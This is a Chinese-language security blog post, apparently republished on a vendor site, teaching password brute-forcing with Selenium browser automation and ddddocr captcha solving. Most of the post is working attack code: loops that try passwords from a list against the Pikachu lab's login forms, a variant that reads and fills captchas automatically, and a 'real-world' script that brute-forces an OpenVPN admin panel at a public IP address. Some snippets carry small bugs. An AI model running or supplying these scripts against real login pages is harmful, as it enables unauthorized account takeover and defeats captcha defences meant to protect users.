长亭百川云 - 文章详情

利用Selenium绕过前端js加密及验证码爆破

7bits安全团队

70

2024-07-13

Selenium&ddddocr识别验证码自动化爆破

Selenium是什么?

Selenium可以模拟真实用户对URL中的元素进行操作。部分网站采用了一些流量校验算法,会将数据包中的进行加密,然后与计算出来的值进行比对,如果不能解密就加密的算法就很难使用burp爆破,及修改数据包的功能,而使用Selenium可以模拟人操作网站的行为,用户输入URL打开网站,选中输入框,输入内容,点击登录框。如果目标网站开启了一些校验,这些也会自动经过校验处理。而burp是直接跳过了这些操作,直接向服务器发送数据包。

前期准备

需要保证浏览器的大版本号,和浏览器的驱动程序匹配

  • • 下载Selenium支持的浏览器

  • • 下载Selenium浏览器驱动程序

安装Selenium py库

Selenium py库安装

pip3 install selenium

如何使用?

自己的默认浏览器的主版本号,需要与驱动的主版本号相同

经过上面的操作,下面需要测试python是否能够启动浏览器,能否加载浏览器驱动。可以使用下面的代码来进行测试

from selenium import webdriver  
  
driver = webdriver.Chrome(executable_path=r'C:\WebDriver\bin\chromedriver.exe') #指定crome驱动位置  
  
ActionChains(browser).key_down(Keys.CONTROL).send_keys("t").key_up(Keys.CONTROL).perform() #防止浏览器退出

执行后成功弹出浏览器。

下面来了解一下Selenium的常见语法

常见语法

  
title = driver.title # 获取标题  
driver.implicitly_wait(0.5) # 等待0.5秒  
  
  
URL操作  
driver.get() # 打开新网页  
driver.refresh() # 刷新网页  
  
  
查找元素  
search_box = driver.find_element(by=By.NAME, value="q") # 通过NAME来寻找元素  
search_button = driver.find_element(by=By.ID, value="btnK") # 通过ID来寻找元素  
find_pass = driver.find_element(by=By.XPATH, value='//*[@id="app"]/div/div[1]/div[2]/div[1]/div/div[2]/input') # 通过XPATH的方式来寻找元素  
  
  
操作元素  
search_box.send_keys("Selenium")  # 输入内容  
search_button.click() # 点击按钮  
SearchInput.clear() # 清除内容  
  
获取元素信息  
value = search_box.get_attribute("value")  
  
结束会话   
driver.quit()

大致流程

查找元素 -> 输入内容 -> 点击按钮 -> 获取返回的元素信息(判断是否登录成功)

打开网页

尝试让python程序打开一个网站。这里使用Pikachu的漏洞靶场来测试爆破功能

from selenium import webdriver  
  
  
def main():  
  
    driver = webdriver.Chrome(executable_path=r'C:\WebDriver\bin\chromedriver.exe') #指定crome驱动位置  
    driver.get('http://192.168.180.152/06/vul/burteforce/bf_form.php')#打开指定URL  
  
    ActionChains(browser).key_down(Keys.CONTROL).send_keys("t").key_up(Keys.CONTROL).perform()  
  
  
  
if __name__ == "__main__":  
    main()

元素选择

元素的选择支持ID,NAME,CSS,XPATH等方式,如果在一个DOM中出现两个相同名元素,默认会选择第一个元素。这里推荐使用Xpath的方式寻找路径。

find_login_box = driver.find_element(by=By.XPATH, value='')

账户输入框

通过查看页面,首先确定账户输入框的位置

获取Xpath

选择登录框元素

find_login_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[1]/span/input')

密码输入框

find_pass_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[2]/span/input')

输入内容

    find_login_box.send_keys('admin')  
    find_pass_box.send_keys('password')

运行后会自动打开网址,然后寻找元素,输入内容

点击操作

元素选择

首先选定Login按钮元素

find_button = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/div[2]/label/input')  
find_button.click()

运行python程序,会发现自动输入了账户密码,并点击了登录按钮。

完整代码

from time import sleep  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
  
def main():  
  
    driver = webdriver.Chrome(executable_path=r'C:\WebDriver\bin\chromedriver.exe') #指定crome驱动位置  
    driver.get('http://192.168.180.152/06/vul/burteforce/bf_form.php')  
  
    find_login_box = driver.find_element(by=By.XPATH,value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[1]/span/input')  
    find_pass_box = driver.find_element(by=By.XPATH,value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[2]/span/input')  
  
    find_login_box.send_keys('admin')  
    find_pass_box.send_keys('password')  
  
    find_button = driver.find_element(by=By.XPATH,value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/div[2]/label/input')  
    find_button.click()  
  
    
  
    ActionChains(browser).key_down(Keys.CONTROL).send_keys("t").key_up(Keys.CONTROL).perform()  
  
if __name__ == "__main__":  
    main()

循环读取

接下来要实现的是循环读取字典中的账户密码,这里主要通过在寻找元素处建立循环。设置一个密码字典,让程序每次自动从python字典中取值。

打开文件

首先建立一个名为pass.txt的文档,其中放上一些密码‘

使用python读取文档

    read_passwords = open('pass.txt', 'r', encoding="utf-8")  
    read_passwords.seek(0)

建立循环

这里建立循环使其查找元素,输入密码字典中的密码,登录,不断循环

    for password in read_passwords:  
        find_login_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[1]/span/input')  
        find_pass_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[2]/span/input')  
        find_button = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/div[2]/label/input')  
  
        password = password.strip()  
        find_login_box.send_keys('admin')  
        find_pass_box.send_keys(password)  
        sleep(1)  
        find_button.click()

返回包判断

接下来需要对点击登录后,页面的响应进行判断,从而确定是否登录成功。

对是否登录成功,可以通过一些特定的标志,状态码,返回包,进行判断

        loginYN = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/p').text  
  
        if loginYN == "login success":  
            print("爆破成功,密码为:"+ password)  
  
        sleep(2)

运行后会自动进行输入,如果识别到特征会自动输出

完整代码

from time import sleep  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
  
def login():  
    driver = webdriver.Chrome(executable_path=r'C:\WebDriver\bin\chromedriver.exe')  
  
    driver.get("http://192.168.124.148/test/vul/burteforce/bf_form.php")  
  
    passwords = open('pass.txt','r',encoding="utf-8")  
    passwords.seek(0)  
    for password in passwords:  
        find_login_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[1]/span/input')  
        find_pass_box = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[2]/span/input')  
        find_button = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/div[2]/label/input')  
  
        password = password.strip()  
        find_login_box.send_keys('admin')  
        find_pass_box.send_keys(password)  
        sleep(1)  
        find_button.click()  
  
        loginYN = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/p').text  
        if loginYN == "login success":  
            print("爆破成功,密码为:"+ password)  
  
        sleep(2)  
  
  
    #ActionChains(browser).key_down(Keys.CONTROL).send_keys("t").key_up(Keys.CONTROL).perform()  
  
login()  
  
  

利用ddddorc识别验证码爆破

首先使用官方给的语句,来对验证码进行判断。

逻辑

要实现验证码识别,首先需要将验证码保存,之后利用ddddorc进行识别。

对于动态验证码的保存可以使用selenium中的screenshot方法,网上也存在着通过xpath获取元素并存储图片的方法。

存储图片

find_capcha = driver.find_element(by=By.XPATH,value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[4]/img')  
  
find_capcha.screenshot("showvcode.png")

调用ddddorc识别

        ocr = ddddocr.DdddOcr()  
  
        with open("showvcode.png", 'rb') as f:  
            image = f.read()  
  
        res = ocr.classification(image)  
        print(res)

完整代码

from time import sleep  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
import ddddocr  
  
  
def main():  
    driver = webdriver.Chrome(executable_path=r'C:\WebDriver\bin\chromedriver.exe')  # 指定crome驱动位置  
    driver.get('http://192.168.180.152/06/vul/burteforce/bf_server.php')  
  
    read_passwords = open('pass.txt', 'r', encoding="utf-8")  
    read_passwords.seek(0)  
  
    for password in read_passwords:  
        find_login_box = driver.find_element(by=By.XPATH,  
                                             value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[1]/span/input')  
        find_pass_box = driver.find_element(by=By.XPATH,  
                                            value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[2]/span/input')  
        find_button = driver.find_element(by=By.XPATH,  
                                          value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/div[2]/label/input')  
        find_capcha = driver.find_element(by=By.XPATH,  
                                          value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[4]/img')  
        find_capcha_box = driver.find_element(by=By.XPATH,  
                                              value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/form/label[3]/span/input')  
  
        find_capcha.screenshot("showvcode.png")  
        ocr = ddddocr.DdddOcr()  
        with open("showvcode.png", 'rb') as f:  
            image = f.read()  
        res = ocr.classification(image)  
        print(res)  
  
        password = password.strip()  
        find_login_box.send_keys('admin')  
        find_pass_box.send_keys(password)  
        sleep(1)  
        find_capcha_box.send_keys(res)  
        sleep(3)  
        find_button.click()  
  
        loginYN = driver.find_element(by=By.XPATH, value='//*[@id="main-container"]/div[2]/div/div[2]/div/div/p').text  
  
        if loginYN == "login success":  
            print("爆破成功,密码为:" + password)  
  
        sleep(2)  
  
    ActionChains(browser).key_down(Keys.CONTROL).send_keys("t").key_up(Keys.CONTROL).perform()  
  
  
if __name__ == "__main__":  
    main()  

演示‍

实战利用selenium爆破openvpn

判断是否登录成功

URL由https://xxx/admin/ 变为 https://xxx/admin/status\_overview

if driver.current_url == 'https://158.247.207.44/admin/status_overview':  
    print("登录成功密码为:".password)

完整代码

from time import sleep  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
  
  
def main():  
    options = webdriver.ChromeOptions()  
    options.add_argument('ignore-certificate-errors')  
    driver = webdriver.Chrome(executable_path=r'C:\WebDriver\bin\chromedriver.exe',  
                              chrome_options=options)  # 指定crome驱动位置  
    driver.get('https://158.247.207.44/admin/')  
  
    read_passwords = open('pass.txt', 'r', encoding="utf-8")  
    read_passwords.seek(0)  
  
    for password in read_passwords:  
        find_login_box = driver.find_element(by=By.XPATH, value='//*[@id="username"]')  
        find_pass_box = driver.find_element(by=By.XPATH, value='//*[@id="password"]')  
        find_button = driver.find_element(by=By.XPATH, value='//*[@id="submit-button"]')  
  
        password = password.strip()  
        find_login_box.send_keys('openvpn')  
        find_pass_box.send_keys(password)  
  
        sleep(1)  
        find_button.click()  
  
        if driver.current_url == 'https://158.247.207.44/admin/status_overview':  
            print("登录成功密码为:" + password)  
  
    ActionChains(browser).key_down(Keys.CONTROL).send_keys("t").key_up(Keys.CONTROL).perform()  
  
  
if __name__ == "__main__":  
    main()  

演示

参考

https://selenium-python.readthedocs.io/ https://github.com/sml2h3/ddddocr https://baike.baidu.com/item/Selenium/18266 https://vikyd.github.io/download-chromium-history-version/#/ https://www.selenium.dev/documentation/webdriver/getting\_started/install\_drivers/

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2